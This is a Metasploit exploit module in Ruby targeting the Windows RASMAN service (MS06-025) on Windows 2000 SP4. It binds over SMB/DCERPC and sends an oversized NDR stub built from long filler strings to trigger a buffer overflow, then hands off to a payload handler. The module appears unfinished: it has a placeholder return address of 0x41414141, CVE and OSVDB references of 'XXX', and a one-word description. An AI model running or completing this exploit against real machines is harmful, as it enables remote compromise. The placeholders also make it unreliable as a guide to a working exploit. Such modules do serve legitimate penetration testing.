metasploit-framework/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb

require 'msf/core'

module Msf

class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RASMAN MS06-025',
			'Description'    => %q{
			    RASMAN!
            },
			'Author'         => [ 'pusscat' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 0.1 $',
			'References'     =>
				[
					[ 'OSVDB', 'XXX'],
					[ 'CVE', 'XXX'],
					[ 'MSB', 'MS06-025'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",       # \ / . : $ NULL
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x41414141 } ],  
				],
			'DefaultTarget' => 0))
		register_options(
			[       
				OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
			], self.class)		
	end

	def exploit
		connect()
		smb_login()
		print_status("Trying target #{target.name}...")
		
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		print_status("Binding to #{handle}")
		dcerpc_bind(handle)
		print_status("Bound to #{handle}")

        type2 = 
            NDR.wstring("A" * 34) +      # 34 length
            NDR.wstring("B" * 258) +     # 258 length
            NDR.wstring("C" * 258) +     # 258 length
            NDR.long(1) +
            NDR.long(1)
       
            #fuxorstring = "G" * 212 + "\\\\" + "g" * 43
            #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion"
        fuxorstring = "G" * 552 
            
        type1 = 
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +

            NDR.long(1) + type2 +                # unique type 2

            NDR.wstring("D" * 258) +     # 258 length    

            NDR.long(1) +

            NDR.wstring("E" * 520) +     # 520 length
            #NDR.wstring("F" * 86 + "\\" + "f" * 86 + "\\" + "F" * 86) +     # 260 length
            NDR.wstring("F" * 520) +     # 520 length

            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +
            NDR.long(1) +

            #NDR.wstring(Rex::Text.pattern_create(257)) +     # 257 length
            NDR.wstring(fuxorstring) +     # 514 length
            
			NDR.long(0) + 
            NDR.long(0)  
        
		stubdata = type1 + NDR.long(1)

		print_status('Calling the vulnerable function...')

		begin
			response = dcerpc.call(0xA, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end
end